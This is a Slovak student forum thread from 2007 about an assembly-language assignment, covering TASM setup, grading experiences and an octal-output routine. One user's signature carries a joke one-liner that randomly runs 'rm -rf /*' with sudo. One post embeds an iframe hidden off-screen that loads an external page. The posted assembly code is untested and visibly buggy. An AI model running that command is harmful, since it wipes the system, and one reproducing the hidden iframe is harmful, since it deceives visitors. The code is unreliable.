• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

zapocet SOJ

Started by JCube, 12.11.2007, 02:23:02

« predchdzajce - alie »

Faust

Môže tu niekto šikovny napisat ako spustit nejaky program v TASM 3?

Do priečinka C:\TASM\ som vložil TASM.exe , TLINK.exe ,TD.exe, SYSMAN.EXE a pokus.asm (chyba mi tu este nieco?)

spustim cmd.exe, vojdem do priecinka C:\TASM a ked napisem tasm.exe pokus.asm tak vypise "Can't locate file:pokus.asm" , ale ked napisem tlink.exe pokus.asm tak mi v pohode vytvori subor pokus.map.

Pls poradte ako na to. (heh a nepiste ze som debil, lebo urcite niesom jediny co to nevie  :smokin:) dik...

This is an invasion of PostHumus!

JCube

pod akym win to robis? a ked zadas tasm pokus nejde to?
sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

hrmill

stiahni si hrmill.tym.sk/tasm.zip rozbal,  potom spust cez cmd napis tasm pokus.asm malo by ti vytvorit subor pokus.obj potom zadas tlink pokus.obj a vytvori ti pokus.exe a mas to aspon mne to tak funguje (ja facham na XP)
Čím viac práce človek má, tým sa cíti vyčerpanejší a horšie znáša stres. To isté môžeme povedať o sexe, čím je ho menej, tým je zdravie horšie a účinky stresu výraznejšie. Preto sexujte a sexujte.

puq

chodte na stranku venusa.fei.tuke.sk/soj a tam najdete aj TASM a vzorove subory compile.bat co vam to pekne skompiluje a nemusite to stale zadavat

BossZ

Cafte,

kto kedy planuje odovzdat zdanie?  bv

<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

kOsTi

ja som dnes odovzdal...
:trestac:

hrmill

Quote from: BossZ on  14.12.2007, 01:13:11
Cafte,

kto kedy planuje odovzdat zdanie?  bv

no ja mam cviko v utorok rano tak v tedy este tam chcem nieco poupravovat
Čím viac práce človek má, tým sa cíti vyčerpanejší a horšie znáša stres. To isté môžeme povedať o sexe, čím je ho menej, tým je zdravie horšie a účinky stresu výraznejšie. Preto sexujte a sexujte.

hrmill

Quote from: kOsTi on  14.12.2007, 01:23:42
ja som dnes odovzdal...
a ako si dopadol a co sa vlastne pyta ak sa vobec nieco pyta ???

kOsTi

9/10 ... nejaku cast si vyberie a mas mu strucne povedat ako si to urobil... potom pokuka zdrojak a ked ti to ide tak asi to je secko... aspon tak to bolo u mna...

puq

Quote from: kOsTi on  14.12.2007, 01:26:54
9/10 ... nejaku cast si vyberie a mas mu strucne povedat ako si to urobil... potom pokuka zdrojak a ked ti to ide tak asi to je secko... aspon tak to bolo u mna...

a preco len 9/10??:) co si mal zle?

hrmill

kOsTi a u koho vlastne mas cviko ?

kOsTi

jednu vec som mu nevedel hned presne povedat...

cviko so Simonakom... a myslim ze kazdy odovzdava zadanie u neho... ked sa nemylim...

Faust

Quote from: hrmill on  13.12.2007, 20:07:11
stiahni si hrmill.tym.sk/tasm.zip rozbal,  potom spust cez cmd napis tasm pokus.asm malo by ti vytvorit subor pokus.obj potom zadas tlink pokus.obj a vytvori ti pokus.exe a mas to aspon mne to tak funguje (ja facham na XP)

parada ide to, diki moc hrmill  :buttrock:

hey a co robi ten subor dpmimem.dll ? je tam potrebny?

hrmill

Faust tak to neviem ale mne to tiez bez neho nejde tak asi na nieco bude

JCube

ja som dostal 10/10...pyta sa napriklad preco pri terminacii programu davate MOV AX, 4C00H a potom co program robi a take veci...dalej na hexa vypis sa ma pytal akym sposobom som riesil...

Payne

Cauko,

ja som len chcel ze ako robite konverziu cisla do osmickovej sustavy, bo mne to dajak nejde...

JCube

Quote from: Payne on  15.12.2007, 02:19:24
Cauko,

ja som len chcel ze ako robite konverziu cisla do osmickovej sustavy, bo mne to dajak nejde...
Vypis_Oct PROC NEAR
push bp
mov bp, sp
push ax
push bx
push cx
push dx
mov dx, [bp+4] nastavenie hodnoty čísla do DX
rol dx, 1 rotácia doľava o 1
mov ax, dx nastavenie AX
and ax, 1 výber posledného bitu z AX - ostatne 0
add ax, 30h pripočítaj 30h - nastavenie ASCII kódu
push ax vstupný parameter pre Vypis_Znak 
call Vypis_Znak volanie procedúry
mov cx, 5 nastavenie CX jako počítadlo opakovania cyklu
opak: rol dx, 1 rotácia doľava o 1
rol dx, 1  takto získame ďalšiu osmičkovú číslicu
rol dx, 1
mov ax, dx
and ax, 7Q výber posledných 3 bitov z AX ostatné 0
and ax, 30h
push ax vstupný parameter pre Vypis_znak
call Vypis_Znak
loop opak opakuj ak CX  0
mov ax,"Q"
push ax
call Vypis_Znak Vypis znaku Q - príznak osmičkového čísla
pop dx
pop cx
pop bx
pop ax
pop bp
ret 2
Vypis_Oct ENDP 

Vypis_Znak PROC NEAR procedúra výpisu znaku na obrazovku
push bp
mov bp, sp
push ax
push dx
mov dx, [bp+4] nastavenie hodnoty znaku pre výstup
mov ah, 02h nastavenie služby výpisu znaku 02h
int 21h
pop dx
pop ax
pop bp
ret 2
Vypis_Znak ENDP

nerucim ze to ide..

fat4l

robi tu niekto zadania za $$?....

Payne

Trochu neskoro si sa prebudil zo zimneho spanku, nemyslis?

Urcite su ludia ale pochybujem ze teraz este dakoho pozhanas co ti to spravi, bo kazdy ma toho vela pred uzatvaranim zapoctov...

puq

Quote from: Payne on  15.12.2007, 17:08:58
Trochu neskoro si sa prebudil zo zimneho spanku, nemyslis?

Urcite su ludia ale pochybujem ze teraz este dakoho pozhanas co ti to spravi, bo kazdy ma toho vela pred uzatvaranim zapoctov...

vela krat zadanie so SOJ je o 2-3 minutckach, aspon ja som mal svoje za tolko zrobene, lebo desiatkovy vypis som mal, ale bez desiatkoveho trochu dlhsie a este ked k tomu chces pridat aby ti to vypisovalo hlasky a pekne aby ti vypisalo vysledok do noveho riadku na to treba zas nejaky c as to vymysliet ale ked uz vies ako na to, je to zas otazka CTRL+C a V:)

johnyo13

sakra...aj mne robi problem ten vypis v sestnastkovej sustave...cele zadanie v pohode,ale dalej sa neviem pohnut....mate nieqto radu?
EDIT:vyriesene bp
☼Ѿ☼ ... ☼Ѿ☼

ghoster

ludia robil niekto 14??? alebo aspon nieco opdobne..... pomoze mi s tym niekto?? pls

roman55

ako mam urobyt aby mi nacitanie skoncilo na konci riadku a nie na konci suboru. DIk

Faust

môžeme pri odovzdani mať v zdrojaku komentare?

JCube

Quote from: Faust on  17.12.2007, 00:33:06
môžeme pri odovzdani mať v zdrojaku komentare?
jasne...